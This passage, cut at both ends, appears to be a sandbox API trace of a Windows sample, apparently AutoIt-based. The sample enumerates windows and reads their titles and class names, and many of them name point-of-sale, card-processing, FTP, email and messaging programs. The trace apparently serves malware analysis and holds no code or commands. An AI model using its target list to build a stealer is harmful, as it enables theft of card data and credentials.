wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.891] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0130.892] GetWindowTextW (in: hWnd=0x10128, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.892] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0130.892] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.892] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0130.892] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.892] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.893] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.893] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.893] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.893] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.894] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.894] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.894] GetWindowTextW (in: hWnd=0x100be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.894] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.894] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.895] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.895] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.895] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.895] GetWindowTextW (in: hWnd=0x10098, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.895] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.895] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.896] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.896] GetWindowTextW (in: hWnd=0x10080, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.896] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0130.896] GetWindowTextW (in: hWnd=0x20048, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0130.897] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0130.897] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.897] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.897] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.897] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0130.897] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0130.897] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7df1a8) returned 0x9 [0130.897] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0130.898] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.898] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0130.898] GetWindowTextW (in: hWnd=0x20286, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0130.898] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0130.898] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.898] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0130.899] GetWindowTextW (in: hWnd=0x20364, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.899] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0130.899] GetWindowTextW (in: hWnd=0x10336, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0130.899] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0130.899] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0130.900] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0130.900] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0130.900] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0130.900] GetWindowTextW (in: hWnd=0x10366, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0130.900] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0130.900] GetWindowTextW (in: hWnd=0x10306, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0130.901] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0130.901] GetWindowTextW (in: hWnd=0x10344, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Utg2") returned 4 [0130.901] GetClassNameW (in: hWnd=0x10344, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="utg2_cls") returned 8 [0130.901] GetWindowTextW (in: hWnd=0x10340, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spgagentservice") returned 15 [0130.901] GetClassNameW (in: hWnd=0x10340, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spgagentservicewindow") returned 21 [0130.902] GetWindowTextW (in: hWnd=0x102e6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Barca") returned 5 [0130.902] GetClassNameW (in: hWnd=0x102e6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="barca_class") returned 11 [0130.902] GetWindowTextW (in: hWnd=0x1038e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.902] GetClassNameW (in: hWnd=0x1038e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.902] GetWindowTextW (in: hWnd=0x10342, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Spcwin") returned 6 [0130.902] GetClassNameW (in: hWnd=0x10342, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="spcwin_wnd") returned 10 [0130.909] GetWindowTextW (in: hWnd=0x10338, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fpos") returned 4 [0130.909] GetClassNameW (in: hWnd=0x10338, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fpos") returned 4 [0130.909] GetWindowTextW (in: hWnd=0x10330, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Isspos") returned 6 [0130.910] GetClassNameW (in: hWnd=0x10330, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="issposwin") returned 9 [0130.910] GetWindowTextW (in: hWnd=0x1032e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Far") returned 3 [0130.910] GetClassNameW (in: hWnd=0x1032e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="farclass") returned 8 [0130.910] GetWindowTextW (in: hWnd=0x1032c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Edcsvr") returned 6 [0130.911] GetClassNameW (in: hWnd=0x1032c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="edcsvrwindow") returned 12 [0130.911] GetWindowTextW (in: hWnd=0x102e2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Coreftp") returned 7 [0130.911] GetClassNameW (in: hWnd=0x102e2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="coreftpclass") returned 12 [0130.911] GetWindowTextW (in: hWnd=0x1032a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Mxslipstream") returned 12 [0130.911] GetClassNameW (in: hWnd=0x1032a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="mxslipstream_cls") returned 16 [0130.912] GetWindowTextW (in: hWnd=0x10324, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Thunderbird") returned 11 [0130.912] GetClassNameW (in: hWnd=0x10324, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="thunderbird_app") returned 15 [0130.912] GetWindowTextW (in: hWnd=0x10322, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Aldelo") returned 6 [0130.912] GetClassNameW (in: hWnd=0x10322, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="aldelo_app") returned 10 [0130.912] GetWindowTextW (in: hWnd=0x10320, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Pidgin") returned 6 [0130.913] GetClassNameW (in: hWnd=0x10320, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="pidgin") returned 6 [0130.913] GetWindowTextW (in: hWnd=0x1031e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Outlook") returned 7 [0130.913] GetClassNameW (in: hWnd=0x1031e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="outlook_class") returned 13 [0130.913] GetWindowTextW (in: hWnd=0x10316, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Smartftp") returned 8 [0130.913] GetClassNameW (in: hWnd=0x10316, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="smartftp_wnd") returned 12 [0130.913] GetWindowTextW (in: hWnd=0x10308, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Webdrive") returned 8 [0130.914] GetClassNameW (in: hWnd=0x10308, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="webdrive_wnd") returned 12 [0130.914] GetWindowTextW (in: hWnd=0x10310, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ccv_Server") returned 10 [0130.914] GetClassNameW (in: hWnd=0x10310, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ccv_server_wnd") returned 14 [0130.914] GetWindowTextW (in: hWnd=0x10314, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Creditservice") returned 13 [0130.914] GetClassNameW (in: hWnd=0x10314, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="creditserviceclass") returned 18 [0130.914] GetWindowTextW (in: hWnd=0x102f6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Flashfxp") returned 8 [0130.914] GetClassNameW (in: hWnd=0x102f6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="flashfxpwin") returned 11 [0130.915] GetWindowTextW (in: hWnd=0x10304, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Gmailnotifierpro") returned 16 [0130.915] GetClassNameW (in: hWnd=0x10304, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="gmailnotifierprocls") returned 19 [0130.915] GetWindowTextW (in: hWnd=0x10302, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Accupos") returned 7 [0130.915] GetClassNameW (in: hWnd=0x10302, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="accuposwindow") returned 13 [0130.915] GetWindowTextW (in: hWnd=0x10300, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Winscp") returned 6 [0130.915] GetClassNameW (in: hWnd=0x10300, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="winscp_win") returned 10 [0130.915] GetWindowTextW (in: hWnd=0x102fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Yahoomessenger") returned 14 [0130.915] GetClassNameW (in: hWnd=0x102fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="yahoomessenger_") returned 15 [0130.916] GetWindowTextW (in: hWnd=0x102fc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Whatsapp") returned 8 [0130.916] GetClassNameW (in: hWnd=0x102fc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whatsapp_window") returned 15 [0130.916] GetWindowTextW (in: hWnd=0x102fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Active-Charge") returned 13 [0130.916] GetClassNameW (in: hWnd=0x102fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="active-chargeclass") returned 18 [0130.916] GetWindowTextW (in: hWnd=0x102da, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Operamail") returned 9 [0130.917] GetClassNameW (in: hWnd=0x102da, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="operamail_wnd") returned 13 [0130.917] GetWindowTextW (in: hWnd=0x102f4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Ncftp") returned 5 [0130.917] GetClassNameW (in: hWnd=0x102f4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ncftp_wnd") returned 9 [0130.917] GetWindowTextW (in: hWnd=0x102f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Bitkinex") returned 8 [0130.917] GetClassNameW (in: hWnd=0x102f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="bitkinex_win") returned 12 [0130.917] GetWindowTextW (in: hWnd=0x102f0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Absolutetelnet") returned 14 [0130.918] GetClassNameW (in: hWnd=0x102f0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="absolutetelnetcls") returned 17 [0130.918] GetWindowTextW (in: hWnd=0x102ee, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Foxmailincmail") returned 14 [0130.918] GetClassNameW (in: hWnd=0x102ee, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="foxmailincmailwin") returned 17 [0130.918] GetWindowTextW (in: hWnd=0x102ec, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Trillian") returned 8 [0130.918] GetClassNameW (in: hWnd=0x102ec, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="trillian_wnd") returned 12 [0130.918] GetWindowTextW (in: hWnd=0x102ea, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Filezilla") returned 9 [0130.918] GetClassNameW (in: hWnd=0x102ea, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="filezillawin") returned 12 [0130.919] GetWindowTextW (in: hWnd=0x102e8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Fling") returned 5 [0130.919] GetClassNameW (in: hWnd=0x102e8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="fling") returned 5 [0130.919] GetWindowTextW (in: hWnd=0x102e4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Centralcreditcard") returned 17 [0130.919] GetClassNameW (in: hWnd=0x102e4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="centralcreditcardclass") returned 22 [0130.919] GetWindowTextW (in: hWnd=0x102dc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Afr38") returned 5 [0130.920] GetClassNameW (in: hWnd=0x102dc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="afr38_window") returned 12 [0130.920] GetWindowTextW (in: hWnd=0x102de, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Alftp") returned 5 [0130.920] GetClassNameW (in: hWnd=0x102de, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="alftp_class") returned 11 [0130.920] GetWindowTextW (in: hWnd=0x102d4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Leechftp") returned 8 [0130.920] GetClassNameW (in: hWnd=0x102d4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="leechftpcls") returned 11 [0130.920] GetWindowTextW (in: hWnd=0x102d0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Scriptftp") returned 9 [0130.921] GetClassNameW (in: hWnd=0x102d0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="scriptftpapp") returned 12 [0130.921] GetWindowTextW (in: hWnd=0x102cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Icq") returned 3 [0130.921] GetClassNameW (in: hWnd=0x102cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="icq_app") returned 7 [0130.921] GetWindowTextW (in: hWnd=0x102ce, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Skype") returned 5 [0130.922] GetClassNameW (in: hWnd=0x102ce, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="skype_window") returned 12 [0130.922] GetWindowTextW (in: hWnd=0x102d2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Notepad") returned 7 [0130.922] GetClassNameW (in: hWnd=0x102d2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="notepad_") returned 8 [0130.922] GetWindowTextW (in: hWnd=0x20214, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.922] GetClassNameW (in: hWnd=0x20214, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0130.922] GetWindowTextW (in: hWnd=0x1026c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Story Police") returned 12 [0130.922] GetClassNameW (in: hWnd=0x1026c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Storypoliceapp") returned 14 [0130.923] GetWindowTextW (in: hWnd=0x1026a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Include Effect Seven") returned 20 [0130.923] GetClassNameW (in: hWnd=0x1026a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="include_effect_seven_") returned 21 [0130.923] GetWindowTextW (in: hWnd=0x10268, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Serve") returned 5 [0130.923] GetClassNameW (in: hWnd=0x10268, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="servecls") returned 8 [0130.923] GetWindowTextW (in: hWnd=0x10260, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Weapon Natural") returned 14 [0130.924] GetClassNameW (in: hWnd=0x10260, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="weapon_Natural_win") returned 18 [0130.924] GetWindowTextW (in: hWnd=0x10266, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Camera") returned 6 [0130.924] GetClassNameW (in: hWnd=0x10266, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Camerawindow") returned 12 [0130.924] GetWindowTextW (in: hWnd=0x10262, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nothing Foreign") returned 15 [0130.924] GetClassNameW (in: hWnd=0x10262, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nothing_Foreign_app") returned 19 [0130.924] GetWindowTextW (in: hWnd=0x10264, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Move") returned 4 [0130.924] GetClassNameW (in: hWnd=0x10264, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="movecls") returned 7 [0130.924] GetWindowTextW (in: hWnd=0x40200, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Arrive") returned 6 [0130.925] GetClassNameW (in: hWnd=0x40200, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="arrivewnd") returned 9 [0130.925] GetWindowTextW (in: hWnd=0x1025c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Throw Toward Purpose") returned 20 [0130.925] GetClassNameW (in: hWnd=0x1025c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="throwTowardPurposeclass") returned 23 [0130.925] GetWindowTextW (in: hWnd=0x10244, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Factor Western Forget") returned 21 [0130.925] GetClassNameW (in: hWnd=0x10244, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="factor_Western_forget_window") returned 28 [0130.925] GetWindowTextW (in: hWnd=0x1022e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Clear") returned 5 [0130.925] GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0130.926] GetWindowTextW (in: hWnd=0x10222, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Watch") returned 5 [0130.926] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0130.926] GetWindowTextW (in: hWnd=0x10230, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Who South") returned 9 [0130.926] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0130.926] GetWindowTextW (in: hWnd=0x10226, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Raise Left Buy") returned 14 [0130.926] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0130.926] GetWindowTextW (in: hWnd=0x10218, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Knowledge Sign") returned 14 [0130.927] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0130.927] GetWindowTextW (in: hWnd=0x1020e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drop") returned 4 [0130.927] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0130.927] GetWindowTextW (in: hWnd=0x1020c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="That But") returned 8 [0130.927] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0130.927] GetWindowTextW (in: hWnd=0x10206, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Claim") returned 5 [0130.927] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0130.928] GetWindowTextW (in: hWnd=0x10204, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Quite Do") returned 8 [0130.928] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0130.928] GetWindowTextW (in: hWnd=0x30122, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.928] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.928] GetWindowTextW (in: hWnd=0x30036, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.928] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.928] GetWindowTextW (in: hWnd=0x3003e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.929] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.929] GetWindowTextW (in: hWnd=0x30070, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.929] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.929] GetWindowTextW (in: hWnd=0x201e0, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0130.929] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0130.930] GetWindowTextW (in: hWnd=0x401f2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.930] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0130.930] GetWindowTextW (in: hWnd=0x30288, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.930] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.930] GetWindowTextW (in: hWnd=0x30126, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0130.930] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0130.930] GetWindowTextW (in: hWnd=0x2012c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.931] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0130.931] GetWindowTextW (in: hWnd=0x20084, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.931] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0130.931] GetWindowTextW (in: hWnd=0x301fe, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.931] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.931] GetWindowTextW (in: hWnd=0x201fa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.931] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.932] GetWindowTextW (in: hWnd=0x101be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.932] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0130.932] GetWindowTextW (in: hWnd=0x101b8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.932] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.932] GetWindowTextW (in: hWnd=0x101aa, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Battery Meter") returned 13 [0130.932] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0130.933] GetWindowTextW (in: hWnd=0x101a6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.933] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.933] GetWindowTextW (in: hWnd=0x101a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="DDE Server Window") returned 17 [0130.933] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0130.933] GetWindowTextW (in: hWnd=0x1018e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Task Host Window") returned 16 [0130.933] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0130.933] GetWindowTextW (in: hWnd=0x10110, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.934] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0130.934] GetWindowTextW (in: hWnd=0x10118, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0130.934] GetClassNameW (in: 